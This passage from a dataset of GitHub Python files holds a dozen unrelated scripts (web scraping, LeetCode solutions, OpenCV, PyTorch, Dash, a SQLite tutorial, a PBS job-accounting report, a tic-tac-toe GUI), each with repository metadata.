item['join_date'] = datetime.strptime(item['join_date'].split()[0],'%Y-%m-%d').date()\n item['learn_courses_num'] = int(item['learn_courses_num'])\n self.session.add(User(**item))\n\n # Connect to the database before the spider opens\n def open_spider(self,spider):\n Session = sessionmaker(bind=engine)\n self.session = Session()\n\n # Commit the data and close the connection after the spider closes\n def close_spider(self,spider):\n self.session.commit()\n self.session.close()\n","repo_name":"zxspython/learn_python1","sub_path":"challenge_w4_scrapy/shiyanlou_courses_and_user_spider/shiyanlou/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"20436531415","text":"from typing import List\n\n\nclass Solution:\n def isToeplitzMatrix(self, matrix: List[List[int]]) -> bool:\n Y = len(matrix)\n X = len(matrix[0])\n for y in range(Y):\n for x in range(X):\n if y+1 >= Y or x+1 >= X:\n continue\n if matrix[y][x] != matrix[y+1][x+1]:\n return False\n return True\n","repo_name":"ndjman7/Algorithm","sub_path":"Leetcode/toeplitz-matrix/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"2901500032","text":"import cv2 as cv \nimport numpy as np \n\n\n\nimg = cv.imread('bhai.jpg')\nimg = cv.resize(img, (400,300), interpolation=cv.INTER_AREA)\ncv.imshow('image', img)\n\nblank = np.zeros(img.shape, dtype='uint8')\ncv.imshow('blank', blank)\n\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\ncv.imshow('gray', gray) \n\nret, thresh = cv.threshold(gray, 125, 255, cv.THRESH_BINARY)\ncv.imshow('thresh', thresh)\n\ncanny = cv.Canny(img, 125, 175)\ncv.imshow('canny', canny)\n\ncontours, hierarchies = cv.findContours(canny, cv.RETR_LIST, cv.CHAIN_APPROX_NONE)\nprint(f\"we found {len(contours)} contours\")\n\ncv.drawContours(blank, contours, -1, (0,0,255), 2)\ncv.imshow('contour image', 
blank)\n\ncv.waitKey(0)\n","repo_name":"kunal-kumar-chaudhary/OpenCV","sub_path":"contours.py","file_name":"contours.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22602105250","text":"# In this class we first load the original PreResNet (it should also be compatible with the original ResNet), then strip the current head and attach our own 1, 2, 3, 4 or 5 heads\n# The multi-head model is then registered in model.py;\nimport torch\nimport torch.nn as nn\nimport pdb\n\nclass Multi_FC_Model(nn.Module):\n def __init__(self,model,num_classes,block_expansion=1,num_fc=2):\n '''\n model is the cnn+fc model passed in; its fc layer can be stripped and then one or more fc heads added as needed\n '''\n super(Multi_FC_Model,self).__init__()\n self.num_fc = num_fc\n self.CNN = nn.Sequential(*list(model.children())[:-1])\n # self.fc_list = nn.ModuleList()\n # pdb.set_trace()\n # for i in range(self.num_fc):\n # self.fc_list.append(nn.Linear(512*block_expansion,num_classes))\n # self.train_FLAG = True\n self.fc_main = nn.Linear(512*block_expansion,num_classes)\n self.fc_2 = nn.Linear(512*block_expansion,num_classes)\n \n def forward(self,x):\n x = self.CNN(x)\n\n x = torch.nn.functional.avg_pool2d(x, 4)\n x = x.view(x.size(0), -1)\n\n # outputs = []\n # for fc in self.fc_list:\n # outputs.append(fc(x))\n output_main = self.fc_main(x)\n output_2 = self.fc_2(x.detach())\n\n return output_main, output_2\n\n\n\n","repo_name":"qinwei-hfut/the_BLCL","sub_path":"model/Multi_FC_Model.py","file_name":"Multi_FC_Model.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"26407344184","text":"import plotly.express as px\nimport plotly.graph_objects as go\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nfrom skimage import data, exposure\nimport json\n\nimg = data.camera()\nfig = px.imshow(img, binary_string=True)\nfig.update_layout(dragmode=\"drawrect\")\n\nfig_hist = px.histogram(img.ravel())\n\n# Build App\napp = dash.Dash(__name__)\napp.layout = html.Div(\n [\n html.H3(\"Draw a shape, then modify it.\"),\n html.Div(\n [dcc.Graph(id=\"fig-pic\", figure=fig),],\n style={\"width\": \"60%\", \"display\": \"inline-block\", \"padding\": \"0 0\"},\n ),\n html.Div(\n [dcc.Graph(id=\"graph-hist\", figure=fig_hist),],\n style={\"width\": \"40%\", \"display\": \"inline-block\", \"padding\": \"0 0\"},\n ),\n html.Pre(id=\"annotations\"),\n ]\n)\n\n\n@app.callback(\n Output(\"graph-hist\", \"figure\"),\n Output(\"annotations\", \"children\"),\n Input(\"fig-pic\", \"relayoutData\"),\n prevent_initial_call=True,\n)\ndef on_relayout(relayout_data):\n x0, y0, x1, y1 = (None,) * 4\n if \"shapes\" in relayout_data:\n last_shape = relayout_data[\"shapes\"][-1]\n x0, y0 = int(last_shape[\"x0\"]), int(last_shape[\"y0\"])\n x1, y1 = int(last_shape[\"x1\"]), int(last_shape[\"y1\"])\n if x0 > x1:\n x0, x1 = x1, x0\n if y0 > y1:\n y0, y1 = y1, y0\n elif any([\"shapes\" in key for key in relayout_data]):\n x0 = int([relayout_data[key] for key in relayout_data if \"x0\" in key][0])\n x1 = int([relayout_data[key] for key in relayout_data if \"x1\" in key][0])\n y0 = int([relayout_data[key] for key in relayout_data if \"y0\" in key][0])\n y1 = int([relayout_data[key] for key in relayout_data if \"y1\" in key][0])\n if None not in (x0, y0, x1, y1):\n roi_img = img[y0:y1, x0:x1]\n return (px.histogram(roi_img.ravel()), json.dumps(relayout_data, indent=2))\n else:\n return (dash.no_update,) * 2\n\n\nif __name__ == \"__main__\":\n app.run_server(mode=\"inline\", 
port=8057)\n","repo_name":"plotly/dash-docs","sub_path":"dash_docs/chapters/dash_annotations/examples/modify_shapes_part2.py","file_name":"modify_shapes_part2.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":370,"dataset":"github-code","pt":"60"} +{"seq_id":"73504168191","text":"from typing import List\nfrom core.attribute import Attribute\nfrom core.relation import Relation\nfrom core.dependency import Dependency\n\ndef get_list_of_key_names(relation: Relation) -> List[str]:\n return [att.name for att in relation.primary_keys]\n \ndef get_list_of_attribute_names(relation: Relation) -> List[str]:\n return [att.name for att in relation.attributes]\n\ndef areRelationsEquivalent(A: Relation, B: Relation) -> bool:\n if A.name != B.name:\n return False\n if len(A.attributes) != len(B.attributes):\n return False \n A_attribute_names = [att.name for att in A.attributes]\n B_attribute_names = [att.name for att in B.attributes]\n if sorted(A_attribute_names) != sorted(B_attribute_names):\n return False\n if len(A.primary_keys) != len(B.primary_keys):\n return False\n A_key_names = [att.name for att in A.primary_keys]\n B_key_names = [att.name for att in B.primary_keys]\n if sorted(A_key_names) != sorted(B_key_names):\n return False\n if len(A.dependencies) != len(B.dependencies):\n return False\n for A_dependency in A.dependencies:\n dependency_matched = False\n matching_B_dependency = [dep for dep in B.dependencies if dep.parent == A_dependency.parent]\n for B_dependency in matching_B_dependency:\n if sorted(A_dependency.children) == sorted(B_dependency.children):\n dependency_matched = True\n break\n if not dependency_matched:\n return False\n if len(A.tuples) != len(B.tuples):\n return False\n for A_tuple in A.tuples:\n matching_B_tuple = [B_t for B_t in B.tuples if sorted(B_t) == sorted(A_tuple)]\n if not matching_B_tuple:\n return False\n return True\n\ndef split_tuples_v2(R: Relation, A_Attributes: List[Attribute], B_Attributes: List[Attribute]) -> (List[List[str]], List[List[str]]):\n # Get just the attribute names\n a_attribute_names = [att.name for att in A_Attributes]\n b_attribute_names = [att.name for att in B_Attributes]\n # Get staying_indexes and going_indexes\n a_indexes = []\n b_indexes = []\n for index, attribute in enumerate(R.attributes):\n if attribute.name in a_attribute_names:\n a_indexes.append(index)\n if attribute.name in b_attribute_names:\n b_indexes.append(index)\n # make two subsets of the original tuples mapped to the indexes we just pulled\n a_tuples = []\n b_tuples = []\n for row in R.tuples:\n new_a_tuple = [row[i] for i in a_indexes]\n new_b_tuple = [row[i] for i in b_indexes]\n a_tuples.append(new_a_tuple)\n b_tuples.append(new_b_tuple)\n return (a_tuples, b_tuples)\n\ndef get_relation_name(keys: List[Attribute]) -> str:\n keyNames = [key.name for key in keys]\n return ''.join(keyNames)\n\ndef get_relevant_dependencies(R: Relation, attributes: List[Attribute]) -> List[Dependency]:\n dependencies = []\n for dep in R.dependencies:\n if parent_attribute_present(dep, attributes) and subset_of_children_attribute_present(dep, attributes):\n modified_dep = get_required_dependency_data(dep, attributes)\n dependencies.append(modified_dep)\n return dependencies\n\ndef get_required_dependency_data(dep: Dependency, attributes: List[Attribute]) -> Dependency:\n if all_dependency_attributes_present(dep, attributes):\n return dep\n attribute_names = [att.name for att in attributes]\n 
dependency_subset = Dependency(parent=dep.parent, children=[child for child in dep.children if child in attribute_names])\n return dependency_subset\n\ndef parent_attribute_present(dep: Dependency, attributes: List[Attribute]) -> bool:\n # Get just the attribute names\n attribute_names = [att.name for att in attributes]\n if dep.parent not in attribute_names:\n return False\n return True\n\ndef subset_of_children_attribute_present(dep: Dependency, attributes: List[Attribute]) -> bool:\n # Get just the attribute names\n attribute_names = [att.name for att in attributes]\n for child in dep.children:\n if child in attribute_names:\n return True\n return False\n\ndef all_dependency_attributes_present(dep: Dependency, attributes: List[Attribute]) -> bool:\n # Get just the attribute names\n attribute_names = [att.name for att in attributes]\n if dep.parent not in attribute_names:\n return False\n for child in dep.children:\n if child not in attribute_names:\n return False\n return True\n\ndef split_attributes_by_parent_and_descendants(attributes: List[Attribute], parent: str, descendants: List[str]) -> (List[Attribute], List[Attribute]):\n a_attributes = []\n b_attributes = []\n\n for att in attributes:\n # If it is part of the dependency, it is broken out\n if att.name in descendants or att.name == parent:\n a_attributes.append(att)\n # If it is not part of the dependency, it is kept EXCEPT for the parent which is kept as a foreign key\n if att.name not in descendants:\n b_attributes.append(att)\n \n # Logic check...\n if len(a_attributes) < 2:\n raise Exception(f\"Cannot have a resulting relation with fewer than two attributes.\")\n if len(b_attributes) < 2:\n raise Exception(f\"Cannot have a resulting relation with fewer than two attributes.\")\n \n return (a_attributes, b_attributes)\n\ndef split_relation(R: Relation, A_Attributes: List[Attribute], B_Attributes: List[Attribute]) -> (Relation, Relation):\n # Split the data\n (a_tuples, b_tuples) = split_tuples_v2(R, A_Attributes, B_Attributes)\n # Build relation name\n a_name = get_relation_name(A_Attributes)\n b_name = get_relation_name(B_Attributes)\n # Get dependencies\n a_dependencies = get_relevant_dependencies(R, A_Attributes)\n b_dependencies = get_relevant_dependencies(R, B_Attributes)\n # Split the keys\n a_keys = [key for key in R.primary_keys if key.name in [att.name for att in A_Attributes]]\n if not a_keys:\n a_keys = [att for att in A_Attributes if att.name in [dep.parent for dep in a_dependencies]]\n if not a_keys:\n a_keys = [A_Attributes[0]]\n b_keys = [key for key in R.primary_keys if key.name in [att.name for att in B_Attributes]]\n if not b_keys:\n b_keys = [att for att in B_Attributes if att.name in [dep.parent for dep in b_dependencies]]\n if not b_keys:\n b_keys = [B_Attributes[0]]\n\n A = Relation(\n name=f\"{a_name}s\",\n attributes=A_Attributes,\n tuples=a_tuples,\n primary_keys=a_keys,\n dependencies=a_dependencies\n )\n B = Relation(\n name=f\"{b_name}s\",\n attributes=B_Attributes,\n tuples=b_tuples,\n primary_keys=b_keys,\n dependencies=b_dependencies\n )\n \n return (A, B)","repo_name":"conrad-john/database-normalizer","sub_path":"application/relation_helper_functions.py","file_name":"relation_helper_functions.py","file_ext":"py","file_size_in_byte":6996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29641738318","text":"#! 
/usr/bin/python3\n\nimport sqlite3\n\n# returns a connection object - this line creates the database if it does not already exist\nconnection = sqlite3.connect(\"aquarium.db\")\n\n\n# verify successully created db with this line\n# connection.total_changes is the number of rows that have been changed by the connection object\n# print(connection.total_changes)\n\ncursor = connection.cursor()\n\n\n# The cursor.execute object-method is used to interact with the database\n\n# Creates table in the database\n# cursor.execute(\"CREATE TABLE fish (name TEXT, species TEXT, tank_number INTEGER)\")\n\n\n# data is inserted into the tables in this format.\ncursor.execute(\"INSERT INTO fish VALUES ('jamie', 'cuttlefish', 7)\")\ncursor.execute(\"INSERT INTO fish VALUES ('sammy', 'shark', 1)\")\n\n\n\n# cursor.execute([SQL statments}).fetchall() allows you to fetch all results of a SELECT statement\n\n\n\n# reading data from the database\nrows = cursor.execute(\"SELECT * FROM fish\").fetchall()\n# saving the output into a file 'rows' and then printing it.\nprint(rows)\n\n\n\n# Using a WHERE clause in an sql query - example\n# use '?' to bind arguments to your SQL statements instead of using python string operations\n# Doing it this way protects you against SQL injection attacks\ntarget_fish_name = \"jamie\"\nrows = cursor.execute(\n \"SELECT name, species, tank_number FROM fish WHERE name = ?\", (target_fish_name,),\n ).fetchall()\nprint(rows)\n\n\n\n\n\nwhile True:\n fish_name = input(\"Add fish name to the database: \")\n fish_species = input(\"Fish species: \")\n fish_tank = input(\"Which tank is the fish in? (integer): \")\n cursor.execute(\"INSERT INTO fish VALUES (?, ?, ?)\", (fish_name, fish_species, fish_tank))\n rows = cursor.execute(\"SELECT * FROM fish\").fetchall()\n for row in rows:\n print(row, end='\\n')\n break\n \n\n\n\n# The following statements are necessary for saving results in the database.\n# .commit method is absolutely necessary if you want the data modified to remain in persistent storage\nconnection.commit()\n\n\nconnection.close()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"snidarian/language_fundamentals","sub_path":"python3/modules/sqlite3_module/using_sqlite3.py","file_name":"using_sqlite3.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"38126482447","text":"\"\"\"\r\nPHY407 Final Project\r\n\r\nAuthor: Lisa Nasu-Yu\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom math import exp\r\nfrom random import random, seed, randint\r\nfrom time import time\r\n\r\n# plot format settings\r\nS = 15\r\nL = 15\r\nT = 15\r\n\r\nplt.rc('font', size = S)\r\nplt.rc('axes', titlesize = T)\r\nplt.rc('axes', labelsize = S)\r\nplt.rc('xtick', labelsize = S)\r\nplt.rc('ytick', labelsize = S)\r\nplt.rc('legend', fontsize = L)\r\nplt.rc('figure', titlesize = S)\r\n\r\n\r\ndef deriv2(f, i):\r\n \"\"\"\r\n Calculates second derivative\r\n :param f: [array] series of floats depicting a function\r\n :param i: [int] index in domain at which to calculate the derivative\r\n :return: [float]\r\n \"\"\"\r\n d2 = (f[i+1] - f[i]) / dx\r\n d1 = (f[i] - f[i-1]) / dx\r\n return (d2 - d1) / dx\r\n\r\n\r\ndef V(i, k):\r\n \"\"\"\r\n Calculates potential\r\n :param i: [float] position\r\n :param k: [float] constant in potential\r\n :return: [float] potential at x\r\n \"\"\"\r\n return 0.5*k*i**2\r\n\r\n\r\ndef hamiltonian(f, i, v, k):\r\n \"\"\"\r\n Calculates hamiltonian of some 
wavefunction\r\n :param f: [array] series of floats depicting the wavefunction\r\n :param i: [int] index in domain at which to calculate\r\n :param v: numpy function for potential\r\n :param k: [float] constant in potential\r\n :return: [float]\r\n \"\"\"\r\n return -1 * (hbar**2/(2*m)) * deriv2(f, i) + v(x[i], k) * f[i]\r\n\r\n\r\ndef normalize(f):\r\n \"\"\"\r\n Normalizes wavefunction\r\n :param f: [array] series of floats depicting wavefunction\r\n :return: [array] normalized wavefunction\r\n \"\"\"\r\n return np.sqrt(np.sum([dx*i**2 for i in f]))\r\n\r\n\r\ndef energy(f, v, k):\r\n \"\"\"\r\n Calculates \"energy\" of trial wavefunction\r\n :param f: [array] series of floats depicting trial wavefunction\r\n :param v: numpy function for potential\r\n :param k: [float] constant in potential\r\n :return: [float]\r\n \"\"\"\r\n return np.sum([dx*f[i]*hamiltonian(f, i, v, k) for i in range(1, len(x)-2)])\r\n\r\n\r\ndef sim_annealing(psi, v, k):\r\n \"\"\"\r\n Main function for variational Monte Carlo simulation\r\n :param psi: [array] series of floats depicting initial trial wavefunction\r\n :param v: numpy function for potential\r\n :param k: [float] constant in potential\r\n :return:\r\n \"\"\"\r\n # Main loop\r\n t = 0 # tracks step number\r\n # initiate arrays\r\n psis = []\r\n times = []\r\n energys = []\r\n\r\n # input initial values in arrays\r\n psis.append(psi)\r\n times.append(t)\r\n energyn = np.sum([energy(psi[i],v, k[i]) for i in range(len(k))])\r\n energys.append(energyn)\r\n psi = psi\r\n\r\n # set seed\r\n seed(2)\r\n start_time = time()\r\n # run loop until within 1 percent of actual value\r\n while np.abs(energyn-4.743)/4.743 > 0.01:\r\n t += 1\r\n oldpsi = np.copy(psi)\r\n\r\n # generate weighted random integer\r\n psi_max = np.max(psi[0])\r\n psi_n = 0\r\n r3 = 1\r\n while r3 > psi_n / psi_max:\r\n r1 = random()\r\n r1 = int(r1*len(x) - (len(x)-1)/2)\r\n r2 = random()\r\n r2 = int(r2 * len(x) - (len(x)-1)/2)\r\n if r2 != 0:\r\n psi_n = psi[0][r1]*np.cos(np.arctan(r1/r2)) + psi[1][r2]*np.sin(np.arctan(r1/r2))\r\n else:\r\n psi_n = psi[0][r1]\r\n r3 = random()\r\n\r\n # generate random amount to change psi[ntest] by\r\n frac = np.random.normal(0, 1)\r\n dpsi = 0.5 * (np.abs(oldpsi[0][r1]))\r\n psi[0][r1] += frac * dpsi\r\n psi[0] /= normalize(psi[0]) # normalize\r\n\r\n frac = np.random.normal(0, 1)\r\n dpsi = 0.5 * (np.abs(oldpsi[1][r2]))\r\n psi[1][r2] += frac * dpsi\r\n psi[1] /= normalize(psi[1]) # normalize\r\n\r\n # # generate random integer (not weighted)\r\n # for i in range(len(psi)):\r\n # ntest = randint(1, len(x)-2) #xleft, xright\r\n # frac = np.random.normal(0,1)\r\n # dpsi = 0.5*(np.abs(oldpsi[-1][ntest]))\r\n # psi[i][ntest] += frac*dpsi\r\n # psi[i] /= normalize(psi[i]) # normalize\r\n\r\n # compute energy\r\n old_energy = np.copy(energyn)\r\n energyn = np.sum([energy(psi[i], v, k[i]) for i in range(len(k))])\r\n delta = old_energy - energyn\r\n\r\n # If the move is rejected, swap them back again\r\n if delta < 0:\r\n psi = oldpsi\r\n energyn = old_energy\r\n\r\n # store some values in array\r\n if t in [1e2, 1e3, 1e4, 1e5]:\r\n psis.append(psi)\r\n times.append(t)\r\n energys.append(np.sum([energy(psi[i], v, k[i]) for i in range(len(k))]))\r\n\r\n # prevent overlooping\r\n if t > 1e6:\r\n break\r\n timer = time() - start_time\r\n\r\n # input last sets into array\r\n psis.append(psi)\r\n times.append(t)\r\n energys.append(np.sum([energy(psi[i], v, k[i]) for i in range(len(k))]))\r\n return psis, energys, times, timer\r\n\r\nhbar = 1\r\nm = 1\r\nw = 1\r\ndx 
= 0.2\r\nx = np.arange(-5,5, dx)\r\ntrialx = np.zeros(len(x))\r\ntrialy = np.zeros(len(x))\r\nbounds = 2\r\nxleft = np.where(np.abs(x+bounds) < 1e-12)[0][0]\r\nxright = np.where(np.abs(x-bounds) < 1e-12)[0][0]\r\n\r\n# set intial trial functions\r\n# trialx[xleft:xright] = 1.0 # constant function\r\ntrialx = np.exp(-x**2)\r\ntrialx = trialx/ normalize(trialx) # normalized trial function\r\n\r\n# trialy[xleft:xright] = 1.0\r\ntrialy = np.exp(-x**2)\r\ntrialy = trialy / normalize(trialy)\r\n\r\npsis, energies, ts, timer = sim_annealing([trialx, trialy], V, [10,40])\r\n\r\n# plot trial wave function progress\r\nfor d in range(np.shape(psis)[1]):\r\n plt.figure()\r\n plt.title(r'$\\psi_{trial}$ for 2-D Harmonic Oscillator')\r\n plt.ylabel(r'$\\psi_{trial}$')\r\n plt.xlabel('x [m]')\r\n for i in range(len(ts)):\r\n plt.plot(x, psis[i][d], label=(ts[i]))\r\n plt.legend(title='Step')\r\n # plt.savefig('{}2d montecarlo_exp2.pdf'.format(d))\r\n\r\n# plot energies\r\nplt.figure()\r\nplt.title('Energy')\r\nplt.xlabel('Step')\r\nplt.ylabel(r'Energy [J$\\cdot \\hbar]$')\r\nplt.plot(ts, energies)\r\n# plt.savefig('2energies_exp2.pdf')\r\n\r\n# plot final ground state\r\ncomponent = ['x', 'y']\r\nplt.figure()\r\nplt.title(\"Approximation of Ground State\")\r\nplt.ylabel(r'$\\psi_{0}$')\r\nplt.xlabel('x [m]')\r\nfor n, psix in enumerate(psis[-1]):\r\n plt.plot(x, psix, marker='o', label=component[n])\r\nplt.legend()\r\n# plt.savefig('2dfinal_exp2.pdf')\r\nplt.show()\r\n\r\n# 3d plot\r\nfig, ax = plt.subplots(subplot_kw={\"projection\": \"3d\"})\r\n\r\n# Make data.\r\nX = x\r\nY = x\r\nX, Y = np.meshgrid(X, Y)\r\nZ = np.zeros((len(x), len(x)))\r\nfor i in range(len(x)):\r\n for j in range(len(x)):\r\n theta = np.arctan(np.abs(x[j]/x[i]))\r\n # Z[i,j] = psis[-1][0][i]*np.cos(theta)\r\n Z[i,j] = psis[-1][0][i]*np.cos(theta) + psis[-1][1][j]*np.sin(theta)\r\n\r\n# Plot the surface.\r\nplt.title('Ground State of 2-D Harmonic Oscillator')\r\nsurf = ax.plot_surface(X, Y, Z, cmap=plt.cm.coolwarm,\r\n linewidth=0, antialiased=False)\r\n\r\n# Customize the z axis.\r\nax.zaxis.set_major_locator(plt.LinearLocator(10))\r\n# A StrMethodFormatter is used automatically\r\nax.zaxis.set_major_formatter('{x:.02f}')\r\n\r\n# set ticks\r\nax.set_xticks([-5, -2, 0, 2, 5])\r\nax.set_yticks([-5, -2, 0, 2, 5])\r\nax.set_zticks([0, 0.5, 1, 1.5])\r\n\r\nax.set_xlabel('x')\r\nax.set_ylabel('y')\r\nax.set_zlabel(r'$\\psi$')\r\n\r\n# Add a color bar which maps values to colors.\r\nfig.colorbar(surf, shrink=0.5, aspect=5)\r\n# plt.savefig('3d_exp2.pdf')\r\n\r\nplt.show()\r\n\r\n","repo_name":"lisan-y/PHY407","sub_path":"Variational Monte Carlo Method for Time-Independent Schrodinger Equation/Final_Project.py","file_name":"Final_Project.py","file_ext":"py","file_size_in_byte":7398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74575621949","text":"import basevcstest\nimport vcs\n\n\nclass TestVCSPatterns(basevcstest.VCSBaseTest):\n def testPatterns(self):\n s = self.clt(\"clt\", time=slice(0, 1), squeeze=1)\n iso = self.x.createisofill(\"isoleg\")\n iso.levels = [0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100]\n iso.fillareastyle = \"pattern\"\n iso.fillareacolors = vcs.getcolors(\n [0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100])\n iso.fillareaindices = [1, 2, 4, 6, 8, 10, 12, 14, 16, 18, 20]\n self.x.plot(s, iso, bg=self.bg)\n fnm = \"test_vcs_patterns.png\"\n 
self.checkImage(fnm)\n","repo_name":"CDAT/vcs","sub_path":"tests/test_vcs_patterns.py","file_name":"test_vcs_patterns.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"60"} +{"seq_id":"34785402982","text":"from functools import cache\n\n\nclass Solution:\n def longestPalindromeSubseq(self, s: str) -> int:\n @cache\n def lcs(i: int, j: int) -> int:\n if i >= len(s) or j < 0:\n return 0\n if s[i] == s[j]:\n return 1 + lcs(i + 1, j - 1)\n return max(lcs(i + 1, j), lcs(i, j - 1))\n\n return lcs(0, len(s) - 1)","repo_name":"Munirmohammed/code","sub_path":"longest-palindromic-subsequence/longest-palindromic-subsequence.py","file_name":"longest-palindromic-subsequence.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"31435067167","text":"#!/usr/bin/env python3\n\nimport os\nimport argparse\nimport datetime\nimport traceback\nimport pytz\nimport job_state as _job_state\nimport record as _record\nrecord = _record.record\njob_state = _job_state.job_state\ntimestr2unix = _record.timestr2unix\n\n\ndef smart_time_parser(s, reftime):\n l, r = len(s) if s else 0, reftime\n if l == 8:\n return timestr2unix(s, '%Y%m%d')\n elif l == 6:\n return timestr2unix('20'+s, '%Y%m%d')\n elif l == 4:\n return timestr2unix('%04d%s' % (r.year, s), '%Y%m%d')\n elif l == 2:\n return timestr2unix('%04d%02d%s' % (r.year, r.month, s), '%Y%m%d')\n elif l == 0:\n return timestr2unix('%04d%02d%02d' % (r.year, r.month, r.day), '%Y%m%d')\n else:\n raise ValueError(\"Not any format of yyyymmdd, yymmdd, mmdd, dd.\")\n\n\ndef process(job_states, fn, def_time, user_filter, group_filter, queue_filter):\n for l in open(fn):\n r = record(l)\n if r.rectype is None:\n continue\n if (user_filter and r.user not in user_filter or\n group_filter and r.group not in group_filter or\n queue_filter and r.queue not in queue_filter):\n continue\n if r.jobid not in job_states:\n job_states[r.jobid] = job_state(def_time)\n try:\n job_states[r.jobid].push(r)\n except _job_state.StateError:\n traceback.print_exc()\n print(f\"jobid is {r.jobid}\")\n # exit(1)\n\n\ndef main(start_time, end_time_str, filelist, opts):\n user_filter, group_filter, queue_filter, queue_ignore = map(\n frozenset, [opts.only_user, opts.only_group, opts.only_queue, opts.ignore_queue])\n job_states = {}\n for i in filelist:\n if os.path.isfile(i):\n #print(f\"Processing: {i}\")\n process(job_states, i, start_time, user_filter, group_filter, queue_filter)\n else:\n #print(f\"File not found: {i}\")\n True\n fake_E_rec = end_time_str+';E;-1.dummy;'\n\n user_stat, group_stat = {}, {}\n total_cputime = 0\n for jobid, js in job_states.items():\n if js.state not in 'DER':\n js.push(record(fake_E_rec))\n if opts.verbose or len(js.queues) > 1 and opts.debug_multiqueue:\n print('{:10} {}'.format(jobid, js))\n js.queues = frozenset(js.queues-queue_ignore)\n if opts.user:\n try:\n user_stat[(js.user, js.group, js.queues)] += js.cputime\n except KeyError:\n user_stat[(js.user, js.group, js.queues)] = js.cputime\n except TypeError:\n print(js.queues)\n if opts.group:\n try:\n group_stat[js.group] += js.cputime\n except KeyError:\n group_stat[js.group] = js.cputime\n\n total_cputime += js.cputime\n\n print(f\"Total CPU Time is: {total_cputime}\")\n if opts.user:\n print(\"Total CPU Time per User:\")\n for k, v in user_stat.items():\n if k[0] is None:\n k = ('None', 'None', frozenset())\n print(\"{:13} {:10} {:15} {}\".format(k[0], k[1], 
v, ','.join(k[2])))\n if opts.group:\n print(\"Total CPU Time per Group:\")\n for k, v in group_stat.items():\n if k is None:\n k = 'None'\n print(\"{:10} {:15}\".format(k, v))\n\n\ndef pre_main():\n parser = argparse.ArgumentParser(description='Statistic information of PBS accounting data.')\n parser.add_argument('start_date',\n help='Start date. Format is [[yy]yy]mmdd. Year is set to current year if not specified.')\n parser.add_argument('end_date', nargs='?', help='Same as start_date. If not specified, treat as today.')\n parser.add_argument('-v', '--verbose', action='store_true', help='Print all job stats at the end.')\n parser.add_argument('-u', '--user', action='store_true', help='Group by user.')\n parser.add_argument('-g', '--group', action='store_true', help='Group by group.')\n parser.add_argument('-U', '--only-user', action='append', help='Only count in specified user.', default=[])\n parser.add_argument('-G', '--only-group', action='append', help='Only count in specified group.', default=[])\n parser.add_argument('-Q', '--only-queue', action='append', help='Only count in specified queue.', default=[])\n parser.add_argument('-R', '--ignore-queue', action='append',\n help='Treat specified queue as router queues (do not include them in the final result).', default=[])\n parser.add_argument('-D', '--debug-multiqueue', action='store_true',\n help='Print job stats for multi-queue jobs (which is considered unusual, and might be a hint for jobid conflicts).')\n opts = parser.parse_args()\n # print(opts)\n\n nowtime = pytz.utc.localize(datetime.datetime.now())\n start_time = smart_time_parser(opts.start_date, nowtime)\n end_time = smart_time_parser(opts.end_date, nowtime)\n filelist = []\n t = start_time[1]\n while t <= end_time[1]:\n filelist.append('%04d%02d%02d' % (t.year, t.month, t.day))\n t += datetime.timedelta(days=1)\n\n end_time_str = (end_time[1]+datetime.timedelta(hours=23, minutes=59, seconds=59)).strftime('%m/%d/%Y %H:%M:%S')\n\n main(start_time[0], end_time_str, filelist, opts)\n\n\npre_main()\n","repo_name":"runapp/pbs_report","sub_path":"pbs_report.py","file_name":"pbs_report.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"19386328516","text":"from tkinter import *\nimport os\n\n\n'''\nBOARD STRUCTURE (list representation)\n[\n[ 1, 2, 3 ],\n[ 4, 5, 6 ],\n[ 7, 8, 9 ]\n]\nEach inner list represents a row\n'''\n\n\nclass CharPrompt(Toplevel):\n\n ''' Toplevel prompting the user to pick X or O to play with '''\n\n TITLE = \"\"\n TEXT = \"Choose X or O\"\n BUTTON_SIZE = 70\n LBL_FONT = (\"Calibri\", 16)\n BTN_FONT = (\"Calibri\", 30)\n RESIZABLE = False\n \n def __init__(self, master : Misc):\n super().__init__(master)\n self.title(CharPrompt.TITLE)\n self.resizable(width = CharPrompt.RESIZABLE, height = CharPrompt.RESIZABLE)\n self.label = Label(self, text = CharPrompt.TEXT, font = CharPrompt.LBL_FONT)\n self.label.grid(row = 0, columnspan = 2, sticky = EW)\n # X Button\n self.xframe = Frame(self, height = CharPrompt.BUTTON_SIZE, width = CharPrompt.BUTTON_SIZE)\n self.xframe.grid_propagate(0)\n self.xframe.grid_rowconfigure(0, weight = 1)\n self.xframe.grid_columnconfigure(0, weight = 1)\n self.xbtn = Button(\n self.xframe, text = App.X, font = CharPrompt.BTN_FONT, command = self.chooseX)\n self.xframe.grid(row = 1, column = 0)\n self.xbtn.grid(sticky = NSEW)\n # O Button\n self.oframe = Frame(self, height = 